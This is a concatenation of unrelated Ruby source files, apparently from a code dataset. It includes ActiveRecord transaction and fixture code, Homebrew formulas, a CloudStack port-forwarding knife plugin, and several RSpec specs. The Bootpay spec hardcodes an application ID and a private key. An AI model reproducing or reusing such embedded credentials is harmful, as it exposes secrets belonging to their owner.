def transaction(requires_new: nil, isolation: nil, joinable: true)
if !requires_new && current_transaction.joinable?
if isolation
raise ActiveRecord::TransactionIsolationError, "cannot set isolation when joining a transaction"
end
yield
else
transaction_manager.within_new_transaction(isolation: isolation, joinable: joinable) { yield }
end
rescue ActiveRecord::Rollback
# rollbacks are silently swallowed
end
attr_reader :transaction_manager #:nodoc:
delegate :within_new_transaction, :open_transactions, :current_transaction, :begin_transaction,
:commit_transaction, :rollback_transaction, :materialize_transactions,
:disable_lazy_transactions!, :enable_lazy_transactions!, to: :transaction_manager
def transaction_open?
current_transaction.open?
end
def reset_transaction #:nodoc:
@transaction_manager = ConnectionAdapters::TransactionManager.new(self)
end
# Register a record with the current transaction so that its after_commit and after_rollback callbacks
# can be called.
def add_transaction_record(record)
current_transaction.add_record(record)
end
def transaction_state
current_transaction.state
end
# Begins the transaction (and turns off auto-committing).
def begin_db_transaction() end
def transaction_isolation_levels
{
read_uncommitted: "READ UNCOMMITTED",
read_committed: "READ COMMITTED",
repeatable_read: "REPEATABLE READ",
serializable: "SERIALIZABLE"
}
end
# Begins the transaction with the isolation level set. Raises an error by
# default; adapters that support setting the isolation level should implement
# this method.
def begin_isolated_db_transaction(isolation)
raise ActiveRecord::TransactionIsolationError, "adapter does not support setting transaction isolation"
end
# Commits the transaction (and turns on auto-committing).
def commit_db_transaction() end
# Rolls back the transaction (and turns on auto-committing). Must be
# done if the transaction block raises an exception or returns false.
def rollback_db_transaction
exec_rollback_db_transaction
end
def exec_rollback_db_transaction() end #:nodoc:
def rollback_to_savepoint(name = nil)
exec_rollback_to_savepoint(name)
end
def default_sequence_name(table, column)
nil
end
# Set the sequence to the max value of the table's column.
def reset_sequence!(table, column, sequence = nil)
# Do nothing by default. Implement for PostgreSQL, Oracle, ...
end
# Inserts the given fixture into the table. Overridden in adapters that require
# something beyond a simple insert (eg. Oracle).
# Most of adapters should implement `insert_fixtures` that leverages bulk SQL insert.
# We keep this method to provide fallback
# for databases like sqlite that do not support bulk inserts.
def insert_fixture(fixture, table_name)
# Normalize fixture keys to strings so they can be matched against the
# schema cache's column hash.
fixture = fixture.stringify_keys
columns = schema_cache.columns_hash(table_name)
# Build one bound attribute per fixture key; a key with no matching
# column is a hard error rather than being silently dropped.
binds = fixture.map do |name, value|
if column = columns[name]
type = lookup_cast_type_from_column(column)
Relation::QueryAttribute.new(name, value, type)
else
raise Fixture::FixtureError, %(table "#{table_name}" has no column named #{name.inspect}.)
end
end
table = Arel::Table.new(table_name)
# Convert each bind to its database representation; Hash/Array values
# fall back to YAML (see #with_yaml_fallback).
values = binds.map do |bind|
value = with_yaml_fallback(bind.value_for_database)
[table[bind.name], value]
end
manager = Arel::InsertManager.new
manager.into(table)
manager.insert(values)
execute manager.to_sql, "Fixture Insert"
end
# Inserts a set of fixtures into the table. Overridden in adapters that require
# something beyond a simple insert (eg. Oracle).
# Deprecated in favor of #insert_fixtures_set, which batches rows into a
# single multi-row INSERT instead of one statement per row.
def insert_fixtures(fixtures, table_name)
ActiveSupport::Deprecation.warn(<<-MSG.squish)
`insert_fixtures` is deprecated and will be removed in the next version of Rails.
Consider using `insert_fixtures_set` for performance improvement.
MSG
return if fixtures.empty?
execute(build_fixture_sql(fixtures, table_name), "Fixtures Insert")
end
# Loads a whole fixture set: optionally deletes the listed tables first,
# then bulk-inserts every non-empty fixture table, all inside a single
# (savepoint) transaction with referential integrity disabled.
def insert_fixtures_set(fixture_set, tables_to_delete = [])
fixture_inserts = fixture_set.map do |table_name, fixtures|
next if fixtures.empty?
build_fixture_sql(fixtures, table_name)
end.compact
table_deletes = tables_to_delete.map { |table| "DELETE FROM #{quote_table_name table}".dup }
# Deletes run before inserts; combine_multi_statements may merge them
# into fewer round trips on adapters that support it.
total_sql = Array.wrap(combine_multi_statements(table_deletes + fixture_inserts))
disable_referential_integrity do
transaction(requires_new: true) do
total_sql.each do |sql|
execute sql, "Fixtures Load"
yield if block_given?
end
end
end
end
# SQL fragment used when an INSERT statement supplies no explicit values.
def empty_insert_statement_value(primary_key = nil)
"DEFAULT VALUES"
end
# Sanitizes the given LIMIT parameter in order to prevent SQL injection.
#
# The +limit+ may be anything that can evaluate to a string via #to_s. It
# should look like an integer, or an Arel SQL literal.
#
# Integer and Arel::Nodes::SqlLiteral limits pass through unchanged;
# anything else must parse strictly as an integer (Kernel#Integer raises
# on malformed input, which is the injection guard).
def sanitize_limit(limit)
  return limit if limit.is_a?(Integer) || limit.is_a?(Arel::Nodes::SqlLiteral)
  Integer(limit)
end
# The default strategy for an UPDATE with joins is to use a subquery. This doesn't work
# on MySQL (even when aliasing the tables), but MySQL allows using JOIN directly in
# an UPDATE statement, so in the MySQL adapters we redefine this to do that.
def join_to_update(update, select, key) # :nodoc:
# Constrain the UPDATE to rows whose key appears in the key-only subquery.
subselect = subquery_for(key, select)
update.where key.in(subselect)
end
alias join_to_delete join_to_update
private
# Value emitted for columns a fixture row omits: let the database apply
# its own column default.
def default_insert_value(column)
Arel.sql("DEFAULT")
end
# Builds one multi-row INSERT statement covering every row of +fixtures+.
# Each row supplies a value for every table column: the fixture's own
# value where present, the database DEFAULT otherwise. Raises if a
# fixture names a column the table doesn't have.
def build_fixture_sql(fixtures, table_name)
columns = schema_cache.columns_hash(table_name)
values = fixtures.map do |fixture|
fixture = fixture.stringify_keys
unknown_columns = fixture.keys - columns.keys
if unknown_columns.any?
raise Fixture::FixtureError, %(table "#{table_name}" has no columns named #{unknown_columns.map(&:inspect).join(', ')}.)
end
# Iterate the table's columns (not the fixture's keys) so every row
# has the same arity, as a multi-row VALUES list requires.
columns.map do |name, column|
if fixture.key?(name)
type = lookup_cast_type_from_column(column)
bind = Relation::QueryAttribute.new(name, fixture[name], type)
with_yaml_fallback(bind.value_for_database)
else
default_insert_value(column)
end
end
end
table = Arel::Table.new(table_name)
manager = Arel::InsertManager.new
manager.into(table)
columns.each_key { |column| manager.columns << table[column] }
manager.values = manager.create_values_list(values)
manager.to_sql
end
# Folds a list of SQL statements into a single multi-statement string,
# one statement per line. (Array#* with a String argument is #join.)
def combine_multi_statements(total_sql)
  total_sql * ";\n"
end
# Returns a subquery for the given key using the join information:
# a copy of +select+ whose only projection is +key+ (the original
# select statement is left unmodified).
def subquery_for(key, select)
  select.clone.tap { |subselect| subselect.projections = [key] }
end
# Returns an ActiveRecord::Result instance.
def select(sql, name = nil, binds = [])
exec_query(sql, name, binds, prepare: false)
end
# Same as #select, but asks the adapter to cache the prepared statement
# for reuse on subsequent calls.
def select_prepared(sql, name = nil, binds = [])
exec_query(sql, name, binds, prepare: true)
end
# Hook letting adapters rewrite an INSERT (e.g. to append RETURNING);
# the default passes sql and binds through untouched.
def sql_for_insert(sql, pk, id_value, sequence_name, binds)
[sql, binds]
end
# Extracts the generated primary key from an INSERT's result rows.
def last_inserted_id(result)
single_value_from_rows(result.rows)
end
# First column of the first row, or nil when the result set is empty.
def single_value_from_rows(rows)
  head = rows.first
  head ? head.first : head
end
# Unwraps a Relation into its Arel AST; bare Arel nodes (or SQL strings)
# pass through untouched.
def arel_from_relation(relation)
if relation.is_a?(Relation)
relation.arel
else
relation
end
end
# Fixture values are quoted by Arel, but Hash and Array are not quotable
# scalars — those are serialized to YAML; every other value passes
# through unchanged.
def with_yaml_fallback(value)
  case value
  when Hash, Array
    YAML.dump(value)
  else
    value
  end
end
# Accumulates SQL fragments and bind values while a partial query is
# being rendered; #value returns both arrays for later substitution.
class PartialQueryCollector
def initialize
@parts = []
@binds = []
end
# Appends a literal SQL fragment; returns self so calls can be chained.
def <<(str)
@parts << str
self
end
# Records a bind value and emits a placeholder node in its place.
def add_bind(obj)
@binds << obj
@parts << Arel::Nodes::BindParam.new(1)
self
end
# => [sql_parts, bind_values]
def value
[@parts, @binds]
end
end
end
end
end
| 35.837736 | 134 | 0.630883 |
38549fa2eae4e3d57119c58a038629fad5e37d73 | 403 | # -*- coding: utf-8 -*-
# =Batch Manager=
# =created_at: <%= Time.now.strftime "%Y-%m-%d %H:%M:%S" %>
# =times_limit: 1
ActiveRecord::Base.transaction do
# Everything in this block is rolled back on a dry run.
# @wet is true when the -f option was passed on the command line.
if @wet
BatchManager.logger.info "Wet run completed!"
else
BatchManager.logger.warn "Rolling back."
# ActiveRecord::Rollback aborts the surrounding transaction without
# propagating an error, so a dry run exits cleanly with no DB changes.
raise ActiveRecord::Rollback
end
end
| 22.388889 | 60 | 0.66005 |
38821049aee619c0b7603e12ce9a42bb752ff2cd | 1,280 | class Cromwell < Formula
desc "Workflow Execution Engine using Workflow Description Language"
homepage "https://github.com/broadinstitute/cromwell"
url "https://github.com/broadinstitute/cromwell/releases/download/30.2/cromwell-30.2.jar"
sha256 "dfdc60966807899f6a1d82c6929e26f66aecfdce0f556b8f1918a58f8e523299"
head do
url "https://github.com/broadinstitute/cromwell.git"
depends_on "sbt" => :build
end
bottle :unneeded
depends_on :java => "1.8+"
depends_on "akka"
def install
if build.head?
# HEAD builds compile the fat jar from source with sbt.
system "sbt", "assembly"
libexec.install Dir["target/scala-*/cromwell-*.jar"][0]
else
# Stable builds ship a prebuilt jar in the release tarball.
libexec.install Dir["cromwell-*.jar"][0]
end
# Wrap the installed jar in a `cromwell` launcher script on PATH.
bin.write_jar_script Dir[libexec/"cromwell-*.jar"][0], "cromwell"
end
test do
(testpath/"hello.wdl").write <<-EOS
task hello {
String name
command {
echo 'hello ${name}!'
}
output {
File response = stdout()
}
}
workflow test {
call hello
}
EOS
(testpath/"hello.json").write <<-EOS
{
"test.hello.name": "world"
}
EOS
result = shell_output("#{bin}/cromwell run --inputs hello.json hello.wdl")
assert_match "test.hello.response", result
end
end
| 22.857143 | 91 | 0.627344 |
08259f890b6273ef0c20a76ecf904019dec12825 | 3,999 | #
# Author:: Sander Botman (<[email protected]>)
# Copyright:: Copyright (c) 2013 Sander Botman.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'chef/knife/cs_base'
module KnifeCloudstack
class CsForwardruleCreate < Chef::Knife
include Chef::Knife::KnifeCloudstackBase
deps do
require 'knife-cloudstack/connection'
Chef::Knife.load_deps
end
banner "knife cs forwardrule create hostname 8080:8090:TCP"
option :openfirewall,
:long => "--openfirewall",
:description => "Add rule also to firewall",
:boolean => true
option :syncrequest,
:long => "--sync",
:description => "Execute command as sync request",
:boolean => true
# Entry point: validates the hostname argument, resolves the matching
# virtual machine and its public IP, then creates one forwarding rule
# per remaining CLI argument.
def run
  hostname = @name_args.shift
  # \A/\z anchor the whole string; the previous ^/$ anchors only matched a
  # single line and could be bypassed by input containing newlines.
  unless /\A[a-zA-Z0-9][a-zA-Z0-9-]*\z/.match(hostname)
    ui.error "Invalid hostname. Please specify a short hostname, not an fqdn (e.g. 'myhost' instead of 'myhost.domain.com')."
    exit 1
  end
  params = {}
  params['openfirewall'] = locate_config_value(:openfirewall) ? 'true' : 'false'
  # Look up all server objects.
  params_for_list_object = { 'command' => 'listVirtualMachines' }
  connection_result = connection.list_object(params_for_list_object, "virtualmachine")
  # Find the requested host in the listing (case-insensitive; if several
  # entries match, the last one wins, preserving previous behavior).
  server = {}
  connection_result.each { |n| server = n if n['name'].upcase == hostname.upcase }
  if server['name'].nil?
    ui.error "Cannot find hostname: #{hostname}."
    exit 1
  end
  # Resolve the server's public IP address.
  server_public_address = connection.get_server_public_ip(server)
  ip_address = connection.get_public_ip_address(server_public_address)
  if ip_address.nil? || ip_address['id'].nil?
    ui.error "Cannot find public ip address for hostname: #{hostname}."
    exit 1
  end
  # Each remaining argument is a rule spec: public[:private[:protocol]].
  @name_args.each do |rule|
    create_port_forwarding_rule(ip_address, server['id'], rule, connection, params)
  end
end
# Creates a single forwarding rule for +ip_address+ from a rule spec of
# the form "public[:private[:protocol]]". Private port defaults to the
# public port; protocol defaults to TCP. Static-NAT addresses get an IP
# forwarding rule, everything else a port forwarding rule.
def create_port_forwarding_rule(ip_address, server_id, rule, connection, other_params)
  public_port, private_port, protocol = rule.split(':')
  private_port ||= public_port
  protocol ||= "TCP"
  params = {
    'ipaddressId' => ip_address['id'],
    'protocol' => protocol
  }
  if ip_address['isstaticnat'] == 'true'
    # IP forwarding rules require the same port on both ends.
    other_params['command'] = 'createIpForwardingRule'
    other_params['startport'] = public_port
    other_params['endport'] = public_port
    Chef::Log.debug("Creating IP Forwarding Rule for #{ip_address['ipaddress']} with protocol: #{protocol}, public port: #{public_port}")
  else
    other_params['command'] = 'createPortForwardingRule'
    other_params['privatePort'] = private_port
    other_params['publicPort'] = public_port
    other_params['virtualMachineId'] = server_id
    Chef::Log.debug("Creating Port Forwarding Rule for #{ip_address['id']} with protocol: #{protocol}, public port: #{public_port} and private port: #{private_port} and server: #{server_id}")
  end
  # Assign through a single conditional expression instead of using the
  # ternary operator for its assignment side effects.
  request = params.merge(other_params)
  result =
    if locate_config_value(:syncrequest)
      connection.send_request(request)
    else
      connection.send_async_request(request)
    end
  Chef::Log.debug("AsyncJobResult: #{result}")
end
end
end
| 35.705357 | 171 | 0.664166 |
bbc2f595baef7d3e562de739e93a64923819644a | 1,734 | require 'rails_helper'
require 'sorbet-rails/model_rbi_formatter'
RSpec.describe SorbetRails::ModelRbiFormatter do
before(:all) do
SorbetRails::Utils.rails_eager_load_all!
end
it 'does not throw an error when given an abstract class' do
# Potion is presumably an abstract model with no backing table — the
# formatter must still emit an RBI without reflecting on columns
# (TODO confirm against the dummy app's model definitions).
formatter = SorbetRails::ModelRbiFormatter.new(Potion, Set.new(['Potion']))
expect_match_file(
formatter.generate_rbi,
'expected_potion.rbi',
)
end
it 'generates correct rbi file for Wizard' do
class_set = Set.new(['Wizard', 'Wand', 'SpellBook'])
if Object.const_defined?('ActiveStorage::Attachment')
class_set << 'ActiveStorage::Attachment'
end
if Object.const_defined?('ActiveStorage::Blob')
class_set << 'ActiveStorage::Blob'
end
formatter = SorbetRails::ModelRbiFormatter.new(Wizard, class_set)
expect_match_file(
formatter.generate_rbi,
'expected_wizard.rbi',
)
end
it 'generates strict belongs_to and generate overridden methods' do
formatter = SorbetRails::ModelRbiFormatter.new(Wand, Set.new(['Wizard', 'Wand', 'SpellBook']))
expect_match_file(
formatter.generate_rbi,
'expected_wand.rbi',
)
end
context 'there is a hidden model' do
it 'fallbacks to use ActiveRecord::Relation' do
class_set = Set.new(['Wizard', 'Wand'])
if Object.const_defined?('ActiveStorage::Attachment')
class_set << 'ActiveStorage::Attachment'
end
if Object.const_defined?('ActiveStorage::Blob')
class_set << 'ActiveStorage::Blob'
end
formatter = SorbetRails::ModelRbiFormatter.new(Wizard, class_set)
expect_match_file(
formatter.generate_rbi,
'expected_wizard_wo_spellbook.rbi',
)
end
end
end
| 30.421053 | 98 | 0.689735 |
d5aef8d7c5619b1dd8269f3c11a401651ce05831 | 568 | # frozen_string_literal: true
RSpec.describe Bootpay::Api do
# NOTE(review): the application_id/private_key below appear to be
# sandbox test credentials — confirm they are not production secrets
# before publishing this repository.
it "cancel payment" do
puts "cancel payment"
api = Bootpay::Api.new(
application_id: '5b8f6a4d396fa665fdc2b5ea',
private_key: 'rm6EYECr6aroQVG2ntW0A6LpWnkTgP4uQ3H18sDDUYw=',
)
# Cancellation requires a valid access token first.
if api.request_access_token.success?
response = api.cancel_payment(
receipt_id: "612df0250d681b001de61de6",
# cancel_price: 200,
cancel_username: 'test',
cancel_message: 'test'
)
puts response.data.to_json
end
end
end
| 27.047619 | 69 | 0.646127 |
edf5aa2fc90d57f8c0b40d04f1b9259490ed39fe | 276 | class CreateComments < ActiveRecord::Migration[6.0]
# Adds the comments table: each comment belongs to a tutorial and a user
# and carries free-form review text.
def change
create_table :comments do |t|
t.references :tutorial, null: false, foreign_key: true
t.references :user, null: false, foreign_key: true
t.text :review
t.timestamps
end
end
end
| 23 | 60 | 0.677536 |
7a1c0e49477d9d55e6efa7d8677794368ac94217 | 9,585 | #! /usr/bin/env ruby
require 'spec_helper'
require 'facter/util/loader'
describe Facter::Util::Loader do
before :each do
Facter::Util::Loader.any_instance.unstub(:load_all)
end
# Builds a Loader for a spec from +places+: :env feeds the constructor,
# :search_path is stubbed onto the instance; missing keys default to
# an empty hash / empty array.
def loader_from(places)
  loader = Facter::Util::Loader.new(places[:env] || {})
  loader.stubs(:search_path).returns(places[:search_path] || [])
  loader
end
it "should have a method for loading individual facts by name" do
Facter::Util::Loader.new.should respond_to(:load)
end
it "should have a method for loading all facts" do
Facter::Util::Loader.new.should respond_to(:load_all)
end
it "should have a method for returning directories containing facts" do
Facter::Util::Loader.new.should respond_to(:search_path)
end
# Typo fixed in the example-group description ("seach" -> "search");
# the method under test is #valid_search_path?.
describe "#valid_search_path?" do
  let(:loader) { Facter::Util::Loader.new }

  # Used to have test for " " as a directory since that should
  # be a relative directory, but on Windows in both 1.8.7 and
  # 1.9.3 it is an absolute directory (WTF Windows). Considering
  # we didn't have a valid use case for a " " directory, the
  # test was removed.
  [
    '.',
    '..',
    '...',
    '.foo',
    '../foo',
    'foo',
    'foo/bar',
    'foo/../bar',
    ' /',
    ' \/',
  ].each do |dir|
    it "should be false for relative path #{dir}" do
      loader.should_not be_valid_search_path dir
    end
  end

  [
    '/.',
    '/..',
    '/...',
    '/.foo',
    '/../foo',
    '/foo',
    '/foo/bar',
    '/foo/../bar',
    '/ ',
    '/ /..',
  ].each do |dir|
    it "should be true for absolute path #{dir}" do
      loader.should be_valid_search_path dir
    end
  end

  it "is true for paths with a file:/ uri scheme" do
    loader.should be_valid_search_path 'file:/in/jar'
  end
end
describe "when determining the search path" do
let(:loader) { Facter::Util::Loader.new }
it "should include the facter subdirectory of all paths in ruby LOAD_PATH" do
dirs = $LOAD_PATH.collect { |d| File.expand_path('facter', d) }
loader.stubs(:valid_search_path?).returns(true)
File.stubs(:directory?).returns true
paths = loader.search_path
dirs.each do |dir|
paths.should be_include(dir)
end
end
it "should exclude invalid search paths" do
dirs = $LOAD_PATH.collect { |d| File.join(d, "facter") }
loader.stubs(:valid_search_path?).returns(false)
paths = loader.search_path
dirs.each do |dir|
paths.should_not be_include(dir)
end
end
it "should include all search paths registered with Facter" do
Facter.expects(:search_path).returns %w{/one /two}
loader.stubs(:valid_search_path?).returns true
File.stubs(:directory?).returns false
File.stubs(:directory?).with('/one').returns true
File.stubs(:directory?).with('/two').returns true
paths = loader.search_path
paths.should be_include("/one")
paths.should be_include("/two")
end
it "should warn on invalid search paths registered with Facter" do
Facter.expects(:search_path).returns %w{/one two/three}
loader.stubs(:valid_search_path?).returns false
loader.stubs(:valid_search_path?).with('/one').returns true
loader.stubs(:valid_search_path?).with('two/three').returns false
Facter.expects(:warn).with('Excluding two/three from search path. Fact file paths must be an absolute directory').once
File.stubs(:directory?).returns false
File.stubs(:directory?).with('/one').returns true
paths = loader.search_path
paths.should be_include("/one")
paths.should_not be_include("two/three")
end
it "should strip paths that are valid paths but not are not present" do
Facter.expects(:search_path).returns %w{/one /two}
loader.stubs(:valid_search_path?).returns false
loader.stubs(:valid_search_path?).with('/one').returns true
loader.stubs(:valid_search_path?).with('/two').returns true
File.stubs(:directory?).returns false
File.stubs(:directory?).with('/one').returns true
File.stubs(:directory?).with('/two').returns false
paths = loader.search_path
paths.should be_include("/one")
paths.should_not be_include('/two')
end
describe "and the FACTERLIB environment variable is set" do
it "should include all paths in FACTERLIB" do
File.stubs(:directory?).returns false
File.stubs(:directory?).with('/one/path').returns true
File.stubs(:directory?).with('/two/path').returns true
loader = Facter::Util::Loader.new("FACTERLIB" => "/one/path#{File::PATH_SEPARATOR}/two/path")
File.stubs(:directory?).returns false
File.stubs(:directory?).with('/one/path').returns true
File.stubs(:directory?).with('/two/path').returns true
loader.stubs(:valid_search_path?).returns true
paths = loader.search_path
%w{/one/path /two/path}.each do |dir|
paths.should be_include(dir)
end
end
end
end
describe "when loading facts" do
it "should load values from the matching environment variable if one is present" do
loader = loader_from(:env => { "facter_testing" => "yayness" })
Facter.expects(:add).with("testing")
loader.load(:testing)
end
it "should load any files in the search path with names matching the fact name" do
loader = loader_from(:search_path => %w{/one/dir /two/dir})
loader.expects(:search_path).returns %w{/one/dir /two/dir}
File.stubs(:file?).returns false
File.expects(:file?).with("/one/dir/testing.rb").returns true
Kernel.expects(:load).with("/one/dir/testing.rb")
loader.load(:testing)
end
it 'should not load any ruby files from subdirectories matching the fact name in the search path' do
loader = Facter::Util::Loader.new
loader.stubs(:search_path).returns %w{/one/dir}
File.stubs(:file?).returns false
File.expects(:file?).with("/one/dir/testing.rb").returns true
Kernel.expects(:load).with("/one/dir/testing.rb")
File.stubs(:directory?).with("/one/dir/testing").returns true
loader.stubs(:search_path).returns %w{/one/dir}
Dir.stubs(:entries).with("/one/dir/testing").returns %w{foo.rb bar.rb}
%w{/one/dir/testing/foo.rb /one/dir/testing/bar.rb}.each do |f|
File.stubs(:directory?).with(f).returns false
Kernel.stubs(:load).with(f)
end
loader.load(:testing)
end
it "should not load files that don't end in '.rb'" do
loader = Facter::Util::Loader.new
loader.expects(:search_path).returns %w{/one/dir}
File.stubs(:file?).returns false
File.expects(:file?).with("/one/dir/testing.rb").returns false
File.expects(:exist?).with("/one/dir/testing").never
Kernel.expects(:load).never
loader.load(:testing)
end
end
describe "when loading all facts" do
let(:loader) { Facter::Util::Loader.new }
before :each do
loader.stubs(:search_path).returns []
File.stubs(:directory?).returns true
end
it "should load all files in all search paths" do
loader = loader_from(:search_path => %w{/one/dir /two/dir})
Dir.expects(:glob).with('/one/dir/*.rb').returns %w{/one/dir/a.rb /one/dir/b.rb}
Dir.expects(:glob).with('/two/dir/*.rb').returns %w{/two/dir/c.rb /two/dir/d.rb}
%w{/one/dir/a.rb /one/dir/b.rb /two/dir/c.rb /two/dir/d.rb}.each do |f|
File.expects(:file?).with(f).returns true
Kernel.expects(:load).with(f)
end
loader.load_all
end
it "should not try to load subdirectories of search paths" do
loader.expects(:search_path).returns %w{/one/dir /two/dir}
# a.rb is a directory
Dir.expects(:glob).with('/one/dir/*.rb').returns %w{/one/dir/a.rb /one/dir/b.rb}
File.expects(:file?).with('/one/dir/a.rb').returns false
File.expects(:file?).with('/one/dir/b.rb').returns true
Kernel.expects(:load).with('/one/dir/b.rb')
# c.rb is a directory
Dir.expects(:glob).with('/two/dir/*.rb').returns %w{/two/dir/c.rb /two/dir/d.rb}
File.expects(:file?).with('/two/dir/c.rb').returns false
File.expects(:file?).with('/two/dir/d.rb').returns true
Kernel.expects(:load).with('/two/dir/d.rb')
loader.load_all
end
it "should not raise an exception when a file is unloadable" do
loader.expects(:search_path).returns %w{/one/dir}
Dir.expects(:glob).with('/one/dir/*.rb').returns %w{/one/dir/a.rb}
File.expects(:file?).with('/one/dir/a.rb').returns true
Kernel.expects(:load).with("/one/dir/a.rb").raises(LoadError)
Facter.expects(:warn)
expect { loader.load_all }.to_not raise_error
end
it "should load all facts from the environment" do
loader = loader_from(:env => { "facter_one" => "yayness", "facter_two" => "boo" })
Facter.expects(:add).with('one')
Facter.expects(:add).with('two')
loader.load_all
end
it "should only load all facts one time" do
loader = loader_from(:env => {})
loader.expects(:load_env).once
loader.load_all
loader.load_all
end
end
it "should load facts on the facter search path only once" do
facterlibdir = File.expand_path(File.dirname(__FILE__) + '../../../fixtures/unit/util/loader')
Facter::Util::Loader.new('FACTERLIB' => facterlibdir).load_all
Facter.value(:nosuchfact).should be_nil
end
end
| 32.272727 | 124 | 0.637559 |
38b5daa14d40a902cf249b4344fdcb00a01c2615 | 1,704 | require "language/node"
class Esbuild < Formula
desc "Extremely fast JavaScript bundler and minifier"
homepage "https://esbuild.github.io/"
url "https://registry.npmjs.org/esbuild/-/esbuild-0.14.45.tgz"
sha256 "9a88eb91cd7f053d4229710e635ec0b4e33308fb4195f7c5993a52001301f0df"
license "MIT"
bottle do
sha256 cellar: :any_skip_relocation, arm64_monterey: "0cdc6ed2a143b35500b6862baf1fef3fadb4c33f843c319ae7ee03245f7fec44"
sha256 cellar: :any_skip_relocation, arm64_big_sur: "0cdc6ed2a143b35500b6862baf1fef3fadb4c33f843c319ae7ee03245f7fec44"
sha256 cellar: :any_skip_relocation, monterey: "ba136c45da1c7506a497f184b85ca251df023622ce97827b7d46d2d6df48e5b7"
sha256 cellar: :any_skip_relocation, big_sur: "ba136c45da1c7506a497f184b85ca251df023622ce97827b7d46d2d6df48e5b7"
sha256 cellar: :any_skip_relocation, catalina: "ba136c45da1c7506a497f184b85ca251df023622ce97827b7d46d2d6df48e5b7"
sha256 cellar: :any_skip_relocation, x86_64_linux: "e03f6c28bf14db79fe30e121b34cea81f9d6561fb8a5382c817cdaf5c4eaaf2c"
end
depends_on "node"
def install
# Install the npm package under libexec, then expose its executables.
system "npm", "install", *Language::Node.std_npm_install_args(libexec)
bin.install_symlink Dir["#{libexec}/bin/*"]
end
test do
(testpath/"app.jsx").write <<~EOS
import * as React from 'react'
import * as Server from 'react-dom/server'
let Greet = () => <h1>Hello, world!</h1>
console.log(Server.renderToString(<Greet />))
EOS
system Formula["node"].libexec/"bin/npm", "install", "react", "react-dom"
system bin/"esbuild", "app.jsx", "--bundle", "--outfile=out.js"
assert_equal "<h1>Hello, world!</h1>\n", shell_output("node out.js")
end
end
| 41.560976 | 123 | 0.750587 |
1d5f251dcbf89041e95d260dc8aa4ed9ed18ec9b | 10,707 | # Copyright (c) 2016, 2020, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
require 'logger'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
# An update available for installation on the Windows managed instance.
class OsManagement::Models::AvailableWindowsUpdateSummary
UPDATE_TYPE_ENUM = [
UPDATE_TYPE_SECURITY = 'SECURITY'.freeze,
UPDATE_TYPE_BUG = 'BUG'.freeze,
UPDATE_TYPE_ENHANCEMENT = 'ENHANCEMENT'.freeze,
UPDATE_TYPE_OTHER = 'OTHER'.freeze,
UPDATE_TYPE_UNKNOWN_ENUM_VALUE = 'UNKNOWN_ENUM_VALUE'.freeze
].freeze
IS_ELIGIBLE_FOR_INSTALLATION_ENUM = [
IS_ELIGIBLE_FOR_INSTALLATION_INSTALLABLE = 'INSTALLABLE'.freeze,
IS_ELIGIBLE_FOR_INSTALLATION_NOT_INSTALLABLE = 'NOT_INSTALLABLE'.freeze,
IS_ELIGIBLE_FOR_INSTALLATION_UNKNOWN = 'UNKNOWN'.freeze,
IS_ELIGIBLE_FOR_INSTALLATION_UNKNOWN_ENUM_VALUE = 'UNKNOWN_ENUM_VALUE'.freeze
].freeze
# **[Required]** Windows Update name
# @return [String]
attr_accessor :display_name
# **[Required]** Unique identifier for the Windows update. NOTE - This is not an OCID,
# but is a unique identifier assigned by Microsoft.
# Example: `6981d463-cd91-4a26-b7c4-ea4ded9183ed`
#
# @return [String]
attr_accessor :name
# **[Required]** The purpose of this update.
# @return [String]
attr_reader :update_type
# Indicates whether the update can be installed using OSMS.
# @return [String]
attr_reader :is_eligible_for_installation
# Indicates whether a reboot may be required to complete installation of this update.
# @return [BOOLEAN]
attr_accessor :is_reboot_required_for_installation
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
# rubocop:disable Style/SymbolLiteral
'display_name': :'displayName',
'name': :'name',
'update_type': :'updateType',
'is_eligible_for_installation': :'isEligibleForInstallation',
'is_reboot_required_for_installation': :'isRebootRequiredForInstallation'
# rubocop:enable Style/SymbolLiteral
}
end
# Attribute type mapping.
def self.swagger_types
{
# rubocop:disable Style/SymbolLiteral
'display_name': :'String',
'name': :'String',
'update_type': :'String',
'is_eligible_for_installation': :'String',
'is_reboot_required_for_installation': :'BOOLEAN'
# rubocop:enable Style/SymbolLiteral
}
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
# @option attributes [String] :display_name The value to assign to the {#display_name} property
# @option attributes [String] :name The value to assign to the {#name} property
# @option attributes [String] :update_type The value to assign to the {#update_type} property
# @option attributes [String] :is_eligible_for_installation The value to assign to the {#is_eligible_for_installation} property
# @option attributes [BOOLEAN] :is_reboot_required_for_installation The value to assign to the {#is_reboot_required_for_installation} property
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
self.display_name = attributes[:'displayName'] if attributes[:'displayName']
raise 'You cannot provide both :displayName and :display_name' if attributes.key?(:'displayName') && attributes.key?(:'display_name')
self.display_name = attributes[:'display_name'] if attributes[:'display_name']
self.name = attributes[:'name'] if attributes[:'name']
self.update_type = attributes[:'updateType'] if attributes[:'updateType']
raise 'You cannot provide both :updateType and :update_type' if attributes.key?(:'updateType') && attributes.key?(:'update_type')
self.update_type = attributes[:'update_type'] if attributes[:'update_type']
self.is_eligible_for_installation = attributes[:'isEligibleForInstallation'] if attributes[:'isEligibleForInstallation']
raise 'You cannot provide both :isEligibleForInstallation and :is_eligible_for_installation' if attributes.key?(:'isEligibleForInstallation') && attributes.key?(:'is_eligible_for_installation')
self.is_eligible_for_installation = attributes[:'is_eligible_for_installation'] if attributes[:'is_eligible_for_installation']
